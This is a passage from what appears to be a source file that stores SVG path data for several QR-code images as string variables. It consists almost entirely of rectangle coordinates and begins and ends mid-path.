4.8 24 L 4.8 25.2 L 6.0 25.2 L 6.0 24 z M 19.2 24 L 19.2 25.2 L 20.4 25.2 L 20.4 24 z M 27.6 4.8 L 27.6 6.0 L 28.8 6.0 L 28.8 4.8 z M 26.4 14.4 L 26.4 15.6 L 27.6 15.6 L 27.6 14.4 z M 4.8 8.4 L 4.8 9.6 L 6.0 9.6 L 6.0 8.4 z M 8.4 21.6 L 8.4 22.8 L 9.6 22.8 L 9.6 21.6 z M 9.6 15.6 L 9.6 16.8 L 10.8 16.8 L 10.8 15.6 z M 8.4 8.4 L 8.4 9.6 L 9.6 9.6 L 9.6 8.4 z M 7.2 15.6 L 7.2 16.8 L 8.4 16.8 L 8.4 15.6 z M 15.6 22.8 L 15.6 24.0 L 16.8 24.0 L 16.8 22.8 z M 10.8 19.2 L 10.8 20.4 L 12.0 20.4 L 12.0 19.2 z M 9.6 9.6 L 9.6 10.8 L 10.8 10.8 L 10.8 9.6 z M 8.4 28.8 L 8.4 30.0 L 9.6 30.0 L 9.6 28.8 z M 16.8 19.2 L 16.8 20.4 L 18.0 20.4 L 18.0 19.2 z M 14.4 28.8 L 14.4 30.0 L 15.6 30.0 L 15.6 28.8 z M 12 8.4 L 12 9.6 L 13.2 9.6 L 13.2 8.4 z M 15.6 25.2 L 15.6 26.4 L 16.8 26.4 L 16.8 25.2 z M 22.8 26.4 L 22.8 27.6 L 24.0 27.6 L 24.0 26.4 z M 21.6 21.6 L 21.6 22.8 L 22.8 22.8 L 22.8 21.6 z M 27.6 16.8 L 27.6 18.0 L 28.8 18.0 L 28.8 16.8 z M 22.8 22.8 L 22.8 24.0 L 24.0 24.0 L 24.0 22.8 z M 20.4 18 L 20.4 19.2 L 21.6 19.2 L 21.6 18 z M 7.2 24 L 7.2 25.2 L 8.4 25.2 L 8.4 24 z M 4.8 4.8 L 4.8 6.0 L 6.0 6.0 L 6.0 4.8 z M 25.2 27.6 L 25.2 28.8 L 26.4 28.8 L 26.4 27.6 z M 9.6 21.6 L 9.6 22.8 L 10.8 22.8 L 10.8 21.6 z M 16.8 6 L 16.8 7.2 L 18.0 7.2 L 18.0 6 z M 14.4 25.2 L 14.4 26.4 L 15.6 26.4 L 15.6 25.2 z M 12 19.2 L 12 20.4 L 13.2 20.4 L 13.2 19.2 z M 21.6 28.8 L 21.6 30.0 L 22.8 30.0 L 22.8 28.8 z M 9.6 28.8 L 9.6 30.0 L 10.8 30.0 L 10.8 28.8 z M 18 19.2 L 18 20.4 L 19.2 20.4 L 19.2 19.2 z M 27.6 28.8 L 27.6 30.0 L 28.8 30.0 L 28.8 28.8 z M 25.2 9.6 L 25.2 10.8 L 26.4 10.8 L 26.4 9.6 z M 13.2 15.6 L 13.2 16.8 L 14.4 16.8 L 14.4 15.6 z M 22.8 25.2 L 22.8 26.4 L 24.0 26.4 L 24.0 25.2 z M 12 27.6 L 12 28.8 L 13.2 28.8 L 13.2 27.6 z M 19.2 22.8 L 19.2 24.0 L 20.4 24.0 L 20.4 22.8 z M 26.4 8.4 L 26.4 9.6 L 27.6 9.6 L 27.6 8.4 z M 25.2 15.6 L 25.2 16.8 L 26.4 16.8 L 26.4 15.6 z M 28.8 7.2 L 28.8 8.4 L 30.0 8.4 L 30.0 7.2 z M 26.4 21.6 L 26.4 22.8 L 27.6 22.8 L 27.6 21.6 z M 8.4 14.4 L 8.4 15.6 L 9.6 15.6 L 9.6 14.4 z M 7.2 4.8 L 7.2 6.0 L 8.4 6.0 L 8.4 4.8 z M 9.6 8.4 L 9.6 9.6 L 10.8 9.6 L 10.8 8.4 z M 15.6 10.8 L 15.6 12.0 L 16.8 12.0 L 16.8 10.8 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rm = """<svg height="52.2mm" version="1.1" viewBox="0 0 52.2 52.2" width="52.2mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 32.4 37.8 L 32.4 39.6 L 34.2 39.6 L 34.2 37.8 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 25.2 37.8 L 25.2 39.6 L 27.0 39.6 L 27.0 37.8 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 32.4 14.4 L 32.4 16.2 L 34.2 16.2 L 34.2 14.4 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 30.6 37.8 L 30.6 39.6 L 32.4 39.6 L 32.4 37.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 7.2 25.2 L 7.2 27.0 L 9.0 27.0 L 9.0 25.2 z M 39.6 41.4 L 39.6 43.2 L 41.4 43.2 L 41.4 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 16.2 21.6 L 16.2 23.4 L 18.0 23.4 L 18.0 21.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 25.2 21.6 L 25.2 23.4 L 27.0 23.4 L 27.0 21.6 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 37.8 10.8 L 37.8 12.6 L 39.6 12.6 L 39.6 10.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 32.4 9 L 32.4 10.8 L 34.2 10.8 L 34.2 9 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 14.4 25.2 L 14.4 27.0 L 16.2 27.0 L 16.2 25.2 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 32.4 10.8 L 32.4 12.6 L 34.2 12.6 L 34.2 10.8 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 39.6 25.2 L 39.6 27.0 L 41.4 27.0 L 41.4 25.2 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 16.2 32.4 L 16.2 34.2 L 18.0 34.2 L 18.0 32.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 27 34.2 L 27 36.0 L 28.8 36.0 L 28.8 34.2 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 37.8 21.6 L 37.8 23.4 L 39.6 23.4 L 39.6 21.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 39.6 34.2 L 39.6 36.0 L 41.4 36.0 L 41.4 34.2 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 27 25.2 L 27 27.0 L 28.8 27.0 L 28.8 25.2 z M 37.8 18 L 37.8 19.8 L 39.6 19.8 L 39.6 18 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 28.8 30.6 L 28.8 32.4 L 30.6 32.4 L 30.6 30.6 z M 37.8 27 L 37.8 28.8 L 39.6 28.8 L 39.6 27 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 27 L 7.2 28.8 L 9.0 28.8 L 9.0 27 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 23.4 19.8 L 23.4 21.6 L 25.2 21.6 L 25.2 19.8 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 23.4 43.2 L 23.4 45.0 L 25.2 45.0 L 25.2 43.2 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 30.6 41.4 L 30.6 43.2 L 32.4 43.2 L 32.4 41.4 z M 43.2 16.2 L 43.2 18.0 L 45.0 18.0 L 45.0 16.2 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 23.4 30.6 L 23.4 32.4 L 25.2 32.4 L 25.2 30.6 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 28.8 14.4 L 28.8 16.2 L 30.6 16.2 L 30.6 14.4 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 25.2 43.2 L 25.2 45.0 L 27.0 45.0 L 27.0 43.2 z M 27 43.2 L 27 45.0 L 28.8 45.0 L 28.8 43.2 z M 34.2 23.4 L 34.2 25.2 L 36.0 25.2 L 36.0 23.4 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 30.6 23.4 L 30.6 25.2 L 32.4 25.2 L 32.4 23.4 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 39.6 27 L 39.6 28.8 L 41.4 28.8 L 41.4 27 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 14.4 21.6 L 14.4 23.4 L 16.2 23.4 L 16.2 21.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 23.4 39.6 L 23.4 41.4 L 25.2 41.4 L 25.2 39.6 z M 32.4 23.4 L 32.4 25.2 L 34.2 25.2 L 34.2 23.4 z M 18 37.8 L 18 39.6 L 19.8 39.6 L 19.8 37.8 z M 28.8 23.4 L 28.8 25.2 L 30.6 25.2 L 30.6 23.4 z M 9 43.2 L 9 45.0 L 10.8 45.0 L 10.8 43.2 z M 37.8 34.2 L 37.8 36.0 L 39.6 36.0 L 39.6 34.2 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 28.8 43.2 L 28.8 45.0 L 30.6 45.0 L 30.6 43.2 z M 7.2 34.2 L 7.2 36.0 L 9.0 36.0 L 9.0 34.2 z M 12.6 25.2 L 12.6 27.0 L 14.4 27.0 L 14.4 25.2 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 12.6 36 L 12.6 37.8 L 14.4 37.8 L 14.4 36 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 18 34.2 L 18 36.0 L 19.8 36.0 L 19.8 34.2 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 28.8 32.4 L 28.8 34.2 L 30.6 34.2 L 30.6 32.4 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 37.8 25.2 L 37.8 27.0 L 39.6 27.0 L 39.6 25.2 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 43.2 9 L 43.2 10.8 L 45.0 10.8 L 45.0 9 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 21.6 19.8 L 21.6 21.6 L 23.4 21.6 L 23.4 19.8 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 25.2 16.2 L 25.2 18.0 L 27.0 18.0 L 27.0 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 32.4 36 L 32.4 37.8 L 34.2 37.8 L 34.2 36 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 34.2 18 L 34.2 19.8 L 36.0 19.8 L 36.0 18 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 23.4 28.8 L 23.4 30.6 L 25.2 30.6 L 25.2 28.8 z M 21.6 14.4 L 21.6 16.2 L 23.4 16.2 L 23.4 14.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 28.8 10.8 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 36 10.8 L 36 12.6 L 37.8 12.6 L 37.8 10.8 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 37.8 12.6 L 37.8 14.4 L 39.6 14.4 L 39.6 12.6 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 39.6 21.6 L 39.6 23.4 L 41.4 23.4 L 41.4 21.6 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 23.4 34.2 L 23.4 36.0 L 25.2 36.0 L 25.2 34.2 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 25.2 28.8 L 25.2 30.6 L 27.0 30.6 L 27.0 28.8 z M 21.6 43.2 L 21.6 45.0 L 23.4 45.0 L 23.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 32.4 32.4 L 32.4 34.2 L 34.2 34.2 L 34.2 32.4 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 34.2 34.2 L 34.2 36.0 L 36.0 36.0 L 36.0 34.2 z M 30.6 27 L 30.6 28.8 L 32.4 28.8 L 32.4 27 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 37.8 41.4 L 37.8 43.2 L 39.6 43.2 L 39.6 41.4 z M 14.4 32.4 L 14.4 34.2 L 16.2 34.2 L 16.2 32.4 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 37.8 14.4 L 37.8 16.2 L 39.6 16.2 L 39.6 14.4 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 34.2 37.8 L 34.2 39.6 L 36.0 39.6 L 36.0 37.8 z M 18 41.4 L 18 43.2 L 19.8 43.2 L 19.8 41.4 z M 28.8 34.2 L 28.8 36.0 L 30.6 36.0 L 30.6 34.2 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 37.8 23.4 L 37.8 25.2 L 39.6 25.2 L 39.6 23.4 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 12.6 21.6 L 12.6 23.4 L 14.4 23.4 L 14.4 21.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
rl = """<svg height="87mm" version="1.1" viewBox="0 0 87 87" width="87mm" xmlns="http://www.w3.org/2000/svg"><path d="M 60 30 L 60 33 L 63 33 L 63 30 z M 54 63 L 54 66 L 57 66 L 57 63 z M 48 15 L 48 18 L 51 18 L 51 15 z M 42 63 L 42 66 L 45 66 L 45 63 z M 12 72 L 12 75 L 15 75 L 15 72 z M 60 39 L 60 42 L 63 42 L 63 39 z M 54 24 L 54 27 L 57 27 L 57 24 z M 66 24 L 66 27 L 69 27 L 69 24 z M 51 63 L 51 66 L 54 66 L 54 63 z M 15 30 L 15 33 L 18 33 L 18 30 z M 12 42 L 12 45 L 15 45 L 15 42 z M 66 69 L 66 72 L 69 72 L 69 69 z M 36 27 L 36 30 L 39 30 L 39 27 z M 27 36 L 27 39 L 30 39 L 30 36 z M 24 12 L 24 15 L 27 15 L 27 12 z M 42 36 L 42 39 L 45 39 L 45 36 z M 39 12 L 39 15 L 42 15 L 42 12 z M 42 33 L 42 36 L 45 36 L 45 33 z M 60 21 L 60 24 L 63 24 L 63 21 z M 30 42 L 30 45 L 33 45 L 33 42 z M 48 30 L 48 33 L 51 33 L 51 30 z M 69 54 L 69 57 L 72 57 L 72 54 z M 63 18 L 63 21 L 66 21 L 66 18 z M 12 63 L 12 66 L 15 66 L 15 63 z M 54 15 L 54 18 L 57 18 L 57 15 z M 72 39 L 72 42 L 75 42 L 75 39 z M 66 39 L 66 42 L 69 42 L 69 39 z M 12 24 L 12 27 L 15 27 L 15 24 z M 72 24 L 72 27 L 75 27 L 75 24 z M 36 57 L 36 60 L 39 60 L 39 57 z M 24 42 L 24 45 L 27 45 L 27 42 z M 21 18 L 21 21 L 24 21 L 24 18 z M 18 30 L 18 33 L 21 33 L 21 30 z M 39 54 L 39 57 L 42 57 L 42 54 z M 36 18 L 36 21 L 39 21 L 39 18 z M 30 12 L 30 15 L 33 15 L 33 12 z M 24 60 L 24 63 L 27 63 L 27 60 z M 45 12 L 45 15 L 48 15 L 48 12 z M 39 60 L 39 63 L 42 63 L 42 60 z M 60 12 L 60 15 L 63 15 L 63 12 z M 63 51 L 63 54 L 66 54 L 66 51 z M 60 69 L 60 72 L 63 72 L 63 69 z M 54 18 L 54 21 L 57 21 L 57 18 z M 51 42 L 51 45 L 54 45 L 54 42 z M 18 63 L 18 66 L 21 66 L 21 63 z M 66 42 L 66 45 L 69 45 L 69 42 z M 12 15 L 12 18 L 15 18 L 15 15 z M 15 48 L 15 51 L 18 51 L 18 48 z M 36 48 L 36 51 L 39 51 L 39 48 z M 27 54 L 27 57 L 30 57 L 30 54 z M 21 66 L 21 69 L 24 69 L 24 66 z M 36 66 L 36 69 L 39 69 L 39 66 z M 45 57 L 45 60 L 48 60 L 48 57 z M 39 69 L 39 72 L 42 72 L 42 69 z M 57 60 L 57 63 L 60 63 L 60 60 z M 54 36 L 54 39 L 57 39 L 57 36 z M 30 60 L 30 63 L 33 63 L 33 60 z M 48 36 L 48 39 L 51 39 L 51 36 z M 72 60 L 72 63 L 75 63 L 75 60 z M 66 12 L 66 15 L 69 15 L 69 12 z M 63 36 L 63 39 L 66 39 L 66 36 z M 72 21 L 72 24 L 75 24 L 75 21 z M 18 66 L 18 69 L 21 69 L 21 66 z M 66 57 L 66 60 L 69 60 L 69 57 z M 12 54 L 12 57 L 15 57 L 15 54 z M 18 48 L 18 51 L 21 51 L 21 48 z M 21 63 L 21 66 L 24 66 L 24 63 z M 30 54 L 30 57 L 33 57 L 33 54 z M 45 42 L 45 45 L 48 45 L 48 42 z M 63 30 L 63 33 L 66 33 L 66 30 z M 54 27 L 54 30 L 57 30 L 57 27 z M 48 51 L 48 54 L 51 54 L 51 51 z M 63 45 L 63 48 L 66 48 L 66 45 z M 57 12 L 57 15 L 60 15 L 60 12 z M 72 12 L 72 15 L 75 15 L 75 12 z M 12 45 L 12 48 L 15 48 L 15 45 z M 21 30 L 21 33 L 24 33 L 24 30 z M 18 18 L 18 21 L 21 21 L 21 18 z M 15 42 L 15 45 L 18 45 L 18 42 z M 36 30 L 36 33 L 39 33 L 39 30 z M 39 33 L 39 36 L 42 36 L 42 33 z M 30 24 L 30 27 L 33 27 L 33 24 z M 45 24 L 45 27 L 48 27 L 48 24 z M 42 24 L 42 27 L 45 27 L 45 24 z M 39 72 L 39 75 L 42 75 L 42 72 z M 60 24 L 60 27 L 63 27 L 63 24 z M 48 33 L 48 36 L 51 36 L 51 33 z M 12 66 L 12 69 L 15 69 L 15 66 z M 54 30 L 54 33 L 57 33 L 57 30 z M 48 66 L 48 69 L 51 69 L 51 66 z M 66 30 L 66 33 L 69 33 L 69 30 z M 12 27 L 12 30 L 15 30 L 15 27 z M 51 69 L 51 72 L 54 72 L 54 69 z M 72 27 L 72 30 L 75 30 L 75 27 z M 15 12 L 15 15 L 18 15 L 18 12 z M 12 36 L 12 39 L 15 39 L 15 36 z M 39 51 L 39 54 L 42 54 L 42 51 z M 36 21 L 36 24 L 39 24 L 39 21 z M 24 30 L 24 33 L 27 33 L 27 30 z M 30 15 L 30 18 L 33 18 L 33 15 z M 24 63 L 24 66 L 27 66 L 27 63 z M 54 48 L 54 51 L 57 51 L 57 48 z M 27 72 L 27 75 L 30 75 L 30 72 z M 48 24 L 48 27 L 51 27 L 51 24 z M 30 72 L 30 75 L 33 75 L 33 72 z M 42 72 L 42 75 L 45 75 L 45 72 z M 45 72 L 45 75 L 48 75 L 48 72 z M 57 39 L 57 42 L 60 42 L 60 39 z M 54 21 L 54 24 L 57 24 L 57 21 z M 51 39 L 51 42 L 54 42 L 54 39 z M 60 72 L 60 75 L 63 75 L 63 72 z M 66 45 L 66 48 L 69 48 L 69 45 z M 12 18 L 12 21 L 15 21 L 15 18 z M 63 63 L 63 66 L 66 66 L 66 63 z M 36 51 L 36 54 L 39 54 L 39 51 z M 24 36 L 24 39 L 27 39 L 27 36 z M 21 12 L 21 15 L 24 15 L 24 12 z M 18 36 L 18 39 L 21 39 L 21 36 z M 39 36 L 39 39 L 42 39 L 42 36 z M 42 57 L 42 60 L 45 60 L 45 57 z M 30 18 L 30 21 L 33 21 L 33 18 z M 39 66 L 39 69 L 42 69 L 42 66 z M 54 39 L 54 42 L 57 42 L 57 39 z M 30 63 L 30 66 L 33 66 L 33 63 z M 48 39 L 48 42 L 51 42 L 51 39 z M 15 72 L 15 75 L 18 75 L 18 72 z M 63 57 L 63 60 L 66 60 L 66 57 z M 60 63 L 60 66 L 63 66 L 63 63 z M 51 48 L 51 51 L 54 51 L 54 48 z M 72 48 L 72 51 L 75 51 L 75 48 z M 48 72 L 48 75 L 51 75 L 51 72 z M 12 57 L 12 60 L 15 60 L 15 57 z M 21 42 L 21 45 L 24 45 L 24 42 z M 15 54 L 15 57 L 18 57 L 18 54 z M 39 45 L 39 48 L 42 48 L 42 45 z M 27 12 L 27 15 L 30 15 L 30 12 z M 21 60 L 21 63 L 24 63 L 24 60 z M 42 12 L 42 15 L 45 15 L 45 12 z M 36 60 L 36 63 L 39 63 L 39 60 z M 30 57 L 30 60 L 33 60 L 33 57 z M 60 45 L 60 48 L 63 48 L 63 45 z M 54 42 L 54 45 L 57 45 L 57 42 z M 30 66 L 30 69 L 33 69 L 33 66 z M 48 54 L 48 57 L 51 57 L 51 54 z M 69 30 L 69 33 L 72 33 L 72 30 z M 66 18 L 66 21 L 69 21 L 69 18 z M 63 42 L 63 45 L 66 45 L 66 42 z M 51 57 L 51 60 L 54 60 L 54 57 z M 72 15 L 72 18 L 75 18 L 75 15 z M 18 72 L 18 75 L 21 75 L 21 72 z M 21 39 L 21 42 L 24 42 L 24 39 z M 18 21 L 18 24 L 21 24 L 21 21 z M 36 33 L 36 36 L 39 36 L 39 